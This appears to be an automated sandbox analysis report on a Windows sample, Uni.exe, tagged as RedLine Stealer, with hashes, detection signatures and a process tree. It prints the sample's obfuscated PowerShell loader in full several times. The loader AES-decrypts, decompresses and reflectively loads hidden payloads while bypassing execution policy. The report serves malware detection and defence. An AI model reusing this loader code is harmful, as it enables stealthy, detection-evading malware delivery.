Edit tour

Windows Analysis Report
Uni.exe

Overview

General Information

Sample name:	Uni.exe
Analysis ID:	1575686
MD5:	917c0479804b76ae493bad95bf0c7710
SHA1:	7441c9042a3db3642416bd1fbee680e41fed6000
SHA256:	00f80131b00550bd8cbc45ea7f064b75c4b19fb2df93200f359593c3f5fc54f4
Tags:	exeRedlineStealeruser-lontze7
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Powershell decode and execute

Powershell is started from unusual location (likely to bypass HIPS)

Reads the Security eventlog

Reads the System eventlog

Renames powershell.exe to bypass HIPS

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Executable File Creation

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Gzip Archive Decode Via PowerShell

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Use Short Name Path in Command Line

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

Uni.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\Uni.exe" MD5: 917C0479804B76AE493BAD95BF0C7710)

cmd.exe (PID: 7492 cmdline: cmd /c "Uni.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Uni.bat.exe (PID: 7680 cmdline: "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fVoxT($oPFNE){ $iLIer=[System.Security.Cryptography.Aes]::Create(); $iLIer.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iLIer.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iLIer.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('reBXu8mWH2aPSY80rUiY+qal9/pmltEFd4YzecO07u8='); $iLIer.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SCYRvuoYNjwRzXky6x630g=='); $APXpI=$iLIer.CreateDecryptor(); $return_var=$APXpI.TransformFinalBlock($oPFNE, 0, $oPFNE.Length); $APXpI.Dispose(); $iLIer.Dispose(); $return_var;}function WmmYx($oPFNE){ $toQfi=New-Object System.IO.MemoryStream(,$oPFNE); $LIvgb=New-Object System.IO.MemoryStream; $Glywg=New-Object System.IO.Compression.GZipStream($toQfi, [IO.Compression.CompressionMode]::Decompress); $Glywg.CopyTo($LIvgb); $Glywg.Dispose(); $toQfi.Dispose(); $LIvgb.Dispose(); $LIvgb.ToArray();}function AHAKZ($oPFNE,$XBFqp){ $TaiwF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$oPFNE); $JZvRO=$TaiwF.EntryPoint; $JZvRO.Invoke($null, $XBFqp);}$ZxJef=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Uni.bat').Split([Environment]::NewLine);foreach ($faxqr in $ZxJef) { if ($faxqr.StartsWith('SEROXEN')) { $MyVZJ=$faxqr.Substring(7); break; }}$tSYrU=[string[]]$MyVZJ.Split('\');$WdICd=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[0])));$eFigo=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[1])));AHAKZ $eFigo (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));AHAKZ $WdICd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN')); MD5: 04029E121A0CFA5991749937DD22A1D9)

rundll32.exe (PID: 7796 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)

cleanup

Yara Signatures

Other

Source	Rule	Description	Author	Strings
amsi64_7680.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fVoxT($oPFNE){ $iLIer=[System.Security.Cryptography.Aes]::Create(); $iLIer.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iLIer.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iLIer.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('reBXu8mWH2aPSY80rUiY+qal9/pmltEFd4YzecO07u8='); $iLIer.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SCYRvuoYNjwRzXky6x630g=='); $APXpI=$iLIer.CreateDecryptor(); $return_var=$APXpI.TransformFinalBlock($oPFNE, 0, $oPFNE.Length); $APXpI.Dispose(); $iLIer.Dispose(); $return_var;}function WmmYx($oPFNE){ $toQfi=New-Object System.IO.MemoryStream(,$oPFNE); $LIvgb=New-Object System.IO.MemoryStream; $Glywg=New-Object System.IO.Compression.GZipStream($toQfi, [IO.Compression.CompressionMode]::Decompress); $Glywg.CopyTo($LIvgb); $Glywg.Dispose(); $toQfi.Dispose(); $LIvgb.Dispose(); $LIvgb.ToArray();}function AHAKZ($oPFNE,$XBFqp){ $TaiwF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$oPFNE); $JZvRO=$TaiwF.EntryPoint; $JZvRO.Invoke($null, $XBFqp);}$ZxJef=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Uni.bat').Split([Environment]::NewLine);foreach ($faxqr in $ZxJef) { if ($faxqr.StartsWith('SEROXEN')) { $MyVZJ=$faxqr.Substring(7); break; }}$tSYrU=[string[]]$MyVZJ.Split('\');$WdICd=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[0])));$eFigo=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[1])));AHAKZ $eFigo (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));AHAKZ $WdICd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));, CommandLine: "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fVoxT($oPFNE){ $iLIer=[System.Security.Cryptography.Aes]::Create(); $iLIer.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iLIer.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iLIer.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('reBXu8mWH2aPSY80rUiY+qal9/pmltEFd4YzecO07u8='); $iLIer.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SCYRvuoYNjwRzXky6x630g=='); $APXpI=$iLIer.CreateDecryptor(); $return_var=$APXpI.TransformFinalBlock($oPFNE, 0, $oPFNE.Length); $APXpI.Dispose(); $iLIer.Dispose(); $return_var;}function WmmYx($oPFNE){ $toQfi=New-Object System.IO.MemoryStream(,$oPFNE); $LIvgb=New-Object System.IO.MemoryStream; $Glywg=New-Object System.IO.Compression.GZipStream($toQfi, [IO.Compression.CompressionMode]::Decompress); $Glywg.CopyTo($LIvgb); $Glywg.Dispose(); $toQfi.Dispose(); $LIvgb.Dispose(); $LIvgb.ToArray();}function AHAKZ($oPFNE,$XBFqp){ $TaiwF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$oPFNE); $JZvRO=$TaiwF.EntryPoint; $JZvRO.Invoke($null, $XBFqp);}$ZxJef=[S

Sigma detected: Suspicious Executable File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 7492, TargetFilename: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Uni.exe, ProcessId: 7432, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Sigma detected: Gzip Archive Decode Via PowerShell

Source: Process started

Author: Hieu Tran: Data: Command: "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fVoxT($oPFNE){ $iLIer=[System.Security.Cryptography.Aes]::Create(); $iLIer.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iLIer.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iLIer.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('reBXu8mWH2aPSY80rUiY+qal9/pmltEFd4YzecO07u8='); $iLIer.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SCYRvuoYNjwRzXky6x630g=='); $APXpI=$iLIer.CreateDecryptor(); $return_var=$APXpI.TransformFinalBlock($oPFNE, 0, $oPFNE.Length); $APXpI.Dispose(); $iLIer.Dispose(); $return_var;}function WmmYx($oPFNE){ $toQfi=New-Object System.IO.MemoryStream(,$oPFNE); $LIvgb=New-Object System.IO.MemoryStream; $Glywg=New-Object System.IO.Compression.GZipStream($toQfi, [IO.Compression.CompressionMode]::Decompress); $Glywg.CopyTo($LIvgb); $Glywg.Dispose(); $toQfi.Dispose(); $LIvgb.Dispose(); $LIvgb.ToArray();}function AHAKZ($oPFNE,$XBFqp){ $TaiwF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$oPFNE); $JZvRO=$TaiwF.EntryPoint; $JZvRO.Invoke($null, $XBFqp);}$ZxJef=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Uni.bat').Split([Environment]::NewLine);foreach ($faxqr in $ZxJef) { if ($faxqr.StartsWith('SEROXEN')) { $MyVZJ=$faxqr.Substring(7); break; }}$tSYrU=[string[]]$MyVZJ.Split('\');$WdICd=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[0])));$eFigo=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[1])));AHAKZ $eFigo (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));AHAKZ $WdICd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));, CommandLine: "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fVoxT($oPFNE){ $iLIer=[System.Security.Cryptography.Aes]::Create(); $iLIer.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iLIer.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iLIer.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('reBXu8mWH2aPSY80rUiY+qal9/pmltEFd4YzecO07u8='); $iLIer.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SCYRvuoYNjwRzXky6x630g=='); $APXpI=$iLIer.CreateDecryptor(); $return_var=$APXpI.TransformFinalBlock($oPFNE, 0, $oPFNE.Length); $APXpI.Dispose(); $iLIer.Dispose(); $return_var;}function WmmYx($oPFNE){ $toQfi=New-Object System.IO.MemoryStream(,$oPFNE); $LIvgb=New-Object System.IO.MemoryStream; $Glywg=New-Object System.IO.Compression.GZipStream($toQfi, [IO.Compression.CompressionMode]::Decompress); $Glywg.CopyTo($LIvgb); $Glywg.Dispose(); $toQfi.Dispose(); $LIvgb.Dispose(); $LIvgb.ToArray();}function AHAKZ($oPFNE,$XBFqp){ $TaiwF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$oPFNE); $JZvRO=$TaiwF.EntryPoint; $JZvRO.Invoke($null, $XBFqp);}$ZxJef=[S

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe, ProcessId: 7680, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svkgjrep.zh0.ps1

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fVoxT($oPFNE){ $iLIer=[System.Security.Cryptography.Aes]::Create(); $iLIer.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iLIer.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iLIer.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('reBXu8mWH2aPSY80rUiY+qal9/pmltEFd4YzecO07u8='); $iLIer.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SCYRvuoYNjwRzXky6x630g=='); $APXpI=$iLIer.CreateDecryptor(); $return_var=$APXpI.TransformFinalBlock($oPFNE, 0, $oPFNE.Length); $APXpI.Dispose(); $iLIer.Dispose(); $return_var;}function WmmYx($oPFNE){ $toQfi=New-Object System.IO.MemoryStream(,$oPFNE); $LIvgb=New-Object System.IO.MemoryStream; $Glywg=New-Object System.IO.Compression.GZipStream($toQfi, [IO.Compression.CompressionMode]::Decompress); $Glywg.CopyTo($LIvgb); $Glywg.Dispose(); $toQfi.Dispose(); $LIvgb.Dispose(); $LIvgb.ToArray();}function AHAKZ($oPFNE,$XBFqp){ $TaiwF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$oPFNE); $JZvRO=$TaiwF.EntryPoint; $JZvRO.Invoke($null, $XBFqp);}$ZxJef=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Uni.bat').Split([Environment]::NewLine);foreach ($faxqr in $ZxJef) { if ($faxqr.StartsWith('SEROXEN')) { $MyVZJ=$faxqr.Substring(7); break; }}$tSYrU=[string[]]$MyVZJ.Split('\');$WdICd=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[0])));$eFigo=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[1])));AHAKZ $eFigo (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));AHAKZ $WdICd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));, CommandLine: "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fVoxT($oPFNE){ $iLIer=[System.Security.Cryptography.Aes]::Create(); $iLIer.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iLIer.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iLIer.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('reBXu8mWH2aPSY80rUiY+qal9/pmltEFd4YzecO07u8='); $iLIer.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SCYRvuoYNjwRzXky6x630g=='); $APXpI=$iLIer.CreateDecryptor(); $return_var=$APXpI.TransformFinalBlock($oPFNE, 0, $oPFNE.Length); $APXpI.Dispose(); $iLIer.Dispose(); $return_var;}function WmmYx($oPFNE){ $toQfi=New-Object System.IO.MemoryStream(,$oPFNE); $LIvgb=New-Object System.IO.MemoryStream; $Glywg=New-Object System.IO.Compression.GZipStream($toQfi, [IO.Compression.CompressionMode]::Decompress); $Glywg.CopyTo($LIvgb); $Glywg.Dispose(); $toQfi.Dispose(); $LIvgb.Dispose(); $LIvgb.ToArray();}function AHAKZ($oPFNE,$XBFqp){ $TaiwF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$oPFNE); $JZvRO=$TaiwF.EntryPoint; $JZvRO.Invoke($null, $XBFqp);}$ZxJef=[S

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Uni.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: Uni.exe	Virustotal: Detection: 57%			Perma Link
Source: Uni.exe	ReversingLabs: Detection: 36%

Source: Uni.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb`@) source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdb source: Uni.exe
Source:	Binary string: System.Management.Automation.pdb source: Uni.bat.exe, 00000005.00000002.1418574944.0000016FDAB53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbW@x source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: Uni.exe
Source:	Binary string: CallSite.Targetore.pdbQGbYDI source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \mscorlib.pdbgQT= source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: Uni.bat.exe, 00000005.00000000.1387345834.00007FF6AC87A000.00000002.00000001.01000000.00000004.sdmp, Uni.bat.exe.2.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: Uni.bat.exe, 00000005.00000002.1418574944.0000016FDAB53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: scorlib.pdbPROCVU source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Core.pdbpdb) source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: Uni.bat.exe, 00000005.00000000.1387345834.00007FF6AC87A000.00000002.00000001.01000000.00000004.sdmp, Uni.bat.exe.2.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: Uni.bat.exe, 00000005.00000002.1418302019.0000016FDAAB1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb` source: Uni.bat.exe, 00000005.00000002.1418574944.0000016FDAB53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: re.pdbt source: Uni.bat.exe, 00000005.00000002.1418813880.0000016FDAC83000.00000004.00000020.00020000.00000000.sdmp

Source: Uni.bat.exe, 00000005.00000002.1414374047.0000016FC295C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Uni.bat.exe, 00000005.00000002.1414374047.0000016FC28E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: Uni.bat.exe, 00000005.00000002.1414374047.0000016FC2935000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Code function: 5_2_00007FFAAB8431F5		5_2_00007FFAAB8431F5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Code function: 5_2_00007FFAAB8474BD		5_2_00007FFAAB8474BD

Source: Uni.exe

Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 8403762 bytes, 1 file, at 0x2c +A "Uni.bat", ID 657, number 1, 402 datablocks, 0x1503 compression

Source: Uni.exe	Binary or memory string: OriginalFilename vs Uni.exe
Source: Uni.exe	Binary or memory string: OriginalFilenameWEXTRACT.EXE D vs Uni.exe
Source: Uni.exe	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Uni.exe

Source: classification engine

Classification label: mal88.evad.winEXE@7/6@0/0

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Uni.bat.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03

Source: C:\Users\user\Desktop\Uni.exe

File created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: C:\Users\user\Desktop\Uni.exe

Process created: C:\Windows\System32\cmd.exe cmd /c "Uni.bat"

Source: Uni.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe

Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress); $Glywg.CopyTo($LIvgb); $Glywg.Dispose(); $toQfi.Dispose(); $LIvgb.Dispose(); $LIvgb.ToArray();}function AHAKZ($oPFNE,$XBFqp){ $TaiwF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$oPFNE); $JZvRO=$TaiwF.EntryPoint; $JZvRO.Invoke($null, $XBFqp);}$ZxJef=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Uni.bat').Split([Environment]::NewLine);foreach ($faxqr in $ZxJef) { if ($faxqr.StartsWith('SEROXEN')) { $MyVZJ=$faxqr.Substring(7); break; }}$tSYrU=[string[]]$MyVZJ.Split('\');$WdICd=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[0])));$eFigo=WmmYx (fVoxT ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tSYrU[1])));AHAKZ $eFigo (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));AHAKZ $WdICd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN')); if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") { $myinv = $_.InvocationInfo if ($myinv -and $myinv.MyCommand) { switch -regex ( $myinv.MyCommand.CommandType ) { ([System.Management.Automation.CommandTypes]::ExternalScript) { if ($myinv.MyCommand.Path) { $myinv.MyCommand.Path + " : " } break } ([System.Management.Automation.CommandTypes]::Script) { if ($myinv.MyCommand.ScriptBlock) { $myinv.MyCommand.ScriptBlock.ToString() + " : " } break } default { if ($myinv.InvocationName -match '^[&\.]?$') { if ($myinv.MyCommand.Name)

Source: C:\Users\user\Desktop\Uni.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"

Source: Uni.exe	Virustotal: Detection: 57%
Source: Uni.exe	ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\Uni.exe "C:\Users\user\Desktop\Uni.exe"
Source: C:\Users\user\Desktop\Uni.exe	Process created: C:\Windows\System32\cmd.exe cmd /c "Uni.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Uni.bat.exe "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fVoxT($oPFNE){ $iLIer=[System.Security.Cryptography.Aes]::Create(); $iLIer.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iLIer.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iLIer.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('reBXu8mWH2aPSY80rUiY+qal9/pmltEFd4YzecO07u8='); $iLIer.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SCYRvuoYNjwRzXky6x630g=='); $APXpI=$iLIer.CreateDecryptor(); $return_var=$APXpI.TransformFinalBlock($oPFNE, 0, $oPFNE.Length); $APXpI.Dispose(); $iLIer.Dispose(); $return_var;}function WmmYx($oPFNE){ $toQfi=New-Object System.IO.MemoryStream(,$oPFNE); $LIvgb=New-Object System.IO.MemoryStream; $Glywg=New-Object System.IO.Compression.GZipStream($toQfi, [IO.Compression.CompressionMode]::Decompress); $Glywg.CopyTo($LIvgb); $Glywg.Dispose(); $toQfi.Dispose(); $LIvgb.Dispose(); $LIvgb.ToArray();}function AHAKZ($oPFNE,$XBFqp){ $TaiwF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$oPFNE); $JZvRO=$TaiwF.EntryPoint; $JZvRO.Invoke($null, $XBFqp);}$ZxJef=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join 